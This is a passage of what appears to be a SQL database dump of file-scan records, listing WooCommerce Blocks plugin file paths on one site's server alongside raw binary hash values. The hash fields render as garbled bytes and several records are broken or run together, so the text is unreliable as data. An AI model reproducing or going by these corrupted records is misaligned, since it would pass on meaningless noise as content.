6>TĺvrBʽ','',0,'?'),('\0f:\"pz','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/reviews-by-product.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/reviews-by-product.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ԩ4pJQ\ZnBOQF\\','HGCfo=d%:','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/reviews-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/reviews-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A&Ϟohk',';l4do]uN4\nC }l#~˙N{U:p','',0,'?'),('2D~C,','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/single-product-style.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/single-product-style.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P2ٯ j','5/M R/%)LX& B}#Y%','',0,'?'),('Uee)G} uG','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/single-product.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/single-product.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7bLҥo\rjyn',';\Zv6TXS_l\'ЊcӁBo,1oM','',0,'?'),('xm<+l4se','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/single-product.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/single-product.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w\0k4.0}','%;bԍD-~Bdx%!KZF6i','',0,'?'),('@%\'%¡\n','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/single-product.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/single-product.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SmAb{3','{%Pzyog_2-v;=Ғ','',0,'?'),('P{&h\'JV[','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/stock-filter/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/stock-filter/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t?~_f@c\Z','[YgV{ f0&2,kEmC6\'j','',0,'?'),('}?MW(o','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/stock-filter-frontend.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/stock-filter-frontend.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' \nrxVrp','q]_\n\\I].X_-o17x]','',0,'?'),('U.n\0)Յ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/stock-filter-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/stock-filter-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Zp>UuXt9',' 1\"Z*:\0fkϮX\0','',0,'?'),('W)5_','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/stock-filter-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/stock-filter-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VK#Hx ','\\\"`WN #}48 ~AV^','',0,'?'),('m\rLdV','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/stock-filter-style.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/stock-filter-style.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>[ĚSQ\0V`','VnڴsZ龥-M^2aAe4p? ck','',0,'?'),('\\.taG[łk','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/stock-filter-wrapper-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/stock-filter-wrapper-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lȷgM%','-lc{6\'թHHMaD\\','',0,'?'),('m=do\r\'\ZCD','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/stock-filter-wrapper-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/stock-filter-wrapper-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`iJUj H','q<# S$JjfFpS','',0,'?'),('F%w4vW/P-~','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/stock-filter-wrapper.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/stock-filter-wrapper.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','43}.)[<','ϝGSs?o߃m cc|JM','',0,'?'),('\ZQTK)2y','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/stock-filter.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/stock-filter.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')iEtrV','a^@^۔A6Ś=v鼙','',0,'?'),('{gx^-$','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/stock-filter.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/stock-filter.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';nz3r','FhRr]T)^q\'&\"','',0,'?'),('6N%ya N_r','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/stock-filter.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/stock-filter.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Edkt\0','!,sEKc%Rey.V','',0,'?'),('f0mta&','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/store-notices/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/store-notices/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ri+Dxm','gSS `NjM¦(ԙp&m+V','',0,'?'),('UW[ ]','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/store-notices-style.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/store-notices-style.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j%J3','}UK~03\"f ','',0,'?'),('`\Z-\Z3 ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/store-notices.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/store-notices.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-zI4a^\r\n','4hN&Ǩ-\nx >1seح@(O','',0,'?'),('ήoy In','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/store-notices.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/store-notices.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P\'d ','Ԗ$2bw\"eʆwBu','',0,'?'),('Ck`\nd>','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--active-filters-wrapper--attribute-filter-wrapper--mini-cart-contents-block/cart-button--mi--d6bb29e6-style.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--active-filters-wrapper--attribute-filter-wrapper--mini-cart-contents-block/cart-button--mi--d6bb29e6-style.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A\0tamuIa','aٶf\\b;pgOMF\00O?*~','',0,'?'),('cCz-umx6','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--active-filters-wrapper-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--active-filters-wrapper-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+IB$.]W0 ','\r.dn^v=e}a\0\\\0[5[\Z','',0,'?'),('}x2QOr','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--attribute-filter-wrapper--cart-blocks/order-summary-coupon-form--cart-blocks/order-summary--48e1e4bb-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--attribute-filter-wrapper--cart-blocks/order-summary-coupon-form--cart-blocks/order-summary--48e1e4bb-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H?\nI9\'@K','Eƹ.U\"ç܃3A?Lf \n;','',0,'?'),('Yt= (om','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--attribute-filter-wrapper--rating-filter-wrapper--stock-filter-wrapper-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--attribute-filter-wrapper--rating-filter-wrapper--stock-filter-wrapper-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"//L\"u;|}@','mQu=IAKv!6p/','',0,'?'),('H!Άry','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--cart-blocks/cart-cross-sells-products--cart-blocks/cart-line-items--cart-blocks/cart-order--3c5fe802-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--cart-blocks/cart-cross-sells-products--cart-blocks/cart-line-items--cart-blocks/cart-order--3c5fe802-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$yyeaO','XTbfwM|Hߥ(v\"FcTV','',0,'?'),('g2i?ݾjEI','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--cart-blocks/cart-line-items--checkout-blocks/order-summary-cart-items--mini-cart-contents---233ab542-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--cart-blocks/cart-line-items--checkout-blocks/order-summary-cart-items--mini-cart-contents---233ab542-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';5QB$OAʟI','PxULXuӵQE >״1','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--cart-blocks/proceed-to-checkout-style.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--cart-blocks/proceed-to-checkout-style.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bg: GUJ4','\0@#^cRj','',0,'?'),('9?\r1\\M\"z','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--checkout-blocks/billing-address--checkout-blocks/shipping-address-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--checkout-blocks/billing-address--checkout-blocks/shipping-address-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' \"|!x7','tqNiO07͊|+oRK','',0,'?'),(')t={ t: ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--checkout-blocks/shipping-method-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--checkout-blocks/shipping-method-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HKN/`~@','\\{H>Zt1:j2PƉ','',0,'?'),('󚻙Ϊ_M]>','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--checkout-blocks/shipping-method-style.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--checkout-blocks/shipping-method-style.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ocJO\Z4N\ZtS,i+]U','',0,'?'),('mce4z>1fq','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--mini-cart-contents-block/products-table-style.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--mini-cart-contents-block/products-table-style.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ğ}ISBc','n9FJ. \r!1w` ','',0,'?'),('y?3&xg\n\"','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--product-add-to-cart-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors--product-add-to-cart-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%d\ZN=\n','5> j. 1Q}9ݴI6','',0,'?'),('{Ua#ޒF','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-classic-template-revert-button-style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-classic-template-revert-button-style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DC;k:L-','ph-q>- mS_ \r(?','',0,'?'),('bghmM$̌:','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-classic-template-revert-button-style-style.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-classic-template-revert-button-style-style.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','aܼ$aL R','|0l*C*)1/Yb','',0,'?'),('\n.[ ,c','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-classic-template-revert-button-style.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-classic-template-revert-button-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dw/O`F','Lp :J;`G7 WEnaz','',0,'?'),('|K)Y}b','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-classic-template-revert-button.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-classic-template-revert-button.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' >hjm','-&Aĸ5DGc,խRqP','',0,'?'),('GrWbV62W\Z-','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-classic-template-revert-button.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-classic-template-revert-button.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~1*\r]K~sO',')+0lTT/I1OBhP*_','',0,'?'),(')Cbȫ\\!h','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-data.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-data.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g!ΉWJkz4]','pxv4!XT[#{Q','',0,'?'),('?(W^o','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-data.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-data.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uL\"F{R&','4 a)CW ExD28^pJ=','',0,'?'),('26O ,ETI','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-editor-style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-editor-style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','20}L u7Q/','G /3m+/-3m/qˆ ,','',0,'?'),('[^x:ݯQ4_','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-editor-style.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-editor-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڦe2:a<:ȱcI','O\r)7n+䔲:յMa ','',0,'?'),('\Z3 ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-google-analytics.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-google-analytics.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZJZ3kI','4;1\'I &jBx pI8ĽkK','',0,'?'),('!Xt\'$','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-google-analytics.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-google-analytics.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','){lmC=m','oEɺ ,d.J>P99)-','',0,'?'),('=NkȢ \'o','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-middleware.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-middleware.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','YR8-H>F',' f]P6eRj^^86c','',0,'?'),('[H#ܯXE','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-middleware.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-middleware.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&#@/7 T@p.','p#fLR~^FDȝ/S','',0,'?'),('9{ƊF!j','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-registry.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-registry.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}Km\\*(','#z~?@g-R!r','',0,'?'),('uQWy>','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-registry.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-registry.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' !Lkf \"','\0iLl*h%7','',0,'?'),('/鈼f','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kߊg)mI','\\_2wOBP WC*q','',0,'?'),('Hx.~oϊS\'$FV\0EII$','',0,'?'),('0`qwLG3N&7','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-vendors.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-vendors.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ui@rޮ','<\\;jᖓ;oC|=9x@-','',0,'?'),('- *aЖ\r','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?B\"bS\'N\Z!','D&1];a%8\n!6]\"','',0,'?'),('\Z (1Z?u','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2_*PP','\nWP@𱟡$C[u9>2\'.U','',0,'?'),('+ FLwoj','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','շ!0*N','(y:%A]Eܬ\n','',0,'?'),(' Rm8p ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-interactivity.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-interactivity.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$6h]\Z/','xbyg,q-kW3YJrh+','',0,'?'),('~L`x% ֩','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-interactivity.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-interactivity.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ͳ ГѱI{)','?54lu|zxQתԡRM\'','',0,'?'),('mu&Kj5~W','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-payment-method-bacs.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-payment-method-bacs.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z>\\1}pT','ƊM=[yއ[ig\0q]4i=v','',0,'?'),('V/F'','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-payment-method-bacs.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-payment-method-bacs.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>\0PKmPuR',']S`u%+6a@','',0,'?'),('Y0lnڪuO<1','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-payment-method-cheque.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-payment-method-cheque.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gE?%qhz','[[u5Ր4WU','',0,'?'),('{T,:O*aL2w','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-payment-method-cheque.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-payment-method-cheque.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N\\c5I)\0a',' `Ƹ4zd]u50&_O','',0,'?'),('MȠR A쨙y','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-payment-method-cod.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-payment-method-cod.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.L@\\Sn]q ',']N.TO?!\nZ|͠;L','',0,'?'),(',RD0#*','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-payment-method-cod.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-payment-method-cod.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q?Q\n](~','^:ESOpu,U\Zv6','',0,'?'),(' J tg\0','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-payment-method-paypal.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-payment-method-paypal.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l\'@X','FM9.[5-LӠO?nk\\DF|\0','',0,'?'),('q@VrҪh','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-payment-method-paypal.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-payment-method-paypal.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q J?KCq ','rD!E&N\'qҍ','',0,'?'),('\\;,ӪRpk,*Th','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-settings.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-settings.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nUQo','r^dF^ Bzo~q\'h H ','',0,'?'),(',\"w8F\\\Z0','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-settings.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-settings.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\:WPzӞڰ','& ]_M\"0D{\0j4b/','',0,'?'),('J*pxnA','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-shipping-method-pickup-location.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-shipping-method-pickup-location.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$$~^|>wc(%','',0,'?'),('MV_3G/]f6','wp-content/plugins/woocommerce/packages/woocommerce-blocks/global.d.ts','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/global.d.ts',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ᆴ͜Z;$','xҽ)#<\'FSN1n`vi5yy\'','',0,'?'),('s:|+rj','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/block-error.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/block-error.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o:\nX72s','|\n6=NÑD$Yg?','',0,'?'),('ܾeEi!/!)۲','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/block-placeholders/product-image-gallery.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/block-placeholders/product-image-gallery.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' \"R&\\2','58=OHh-0v-:NXXn','',0,'?'),(' mDz>Fl ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/block-placeholders/product-reviews.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/block-placeholders/product-reviews.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','TJ_..N','ưxw83q2T۵','',0,'?'),('stV0c΄','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/desk-table-wood-chair-floor-home-square.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/desk-table-wood-chair-floor-home-square.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kc&{2','jO,TwUo&7䟱','',0,'?'),('BEO٫)=','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/dining-room.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/dining-room.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h*u)hi','ۙռ5m|M,\Z~\"9A','',0,'?'),('- ļ>\rMa2','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/dish-food-baking-dessert-bread-bakery.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/dish-food-baking-dessert-bread-bakery.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3\"IpfxV',' tB U;aw8a=1','',0,'?'),('\\pt!_','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/dish-meal-food-breakfast-dessert-eat.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/dish-meal-food-breakfast-dessert-eat.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ӑm*+<\n&fN','jH','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/russet-organic-potatoes.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/russet-organic-potatoes.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0>v[}q۷','xr{R #أBthq=G\"%','',0,'?'),('sAKaf9','wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/sweet-organic-lemons.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/images/pattern-placeholders/sweet-organic-lemons.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v 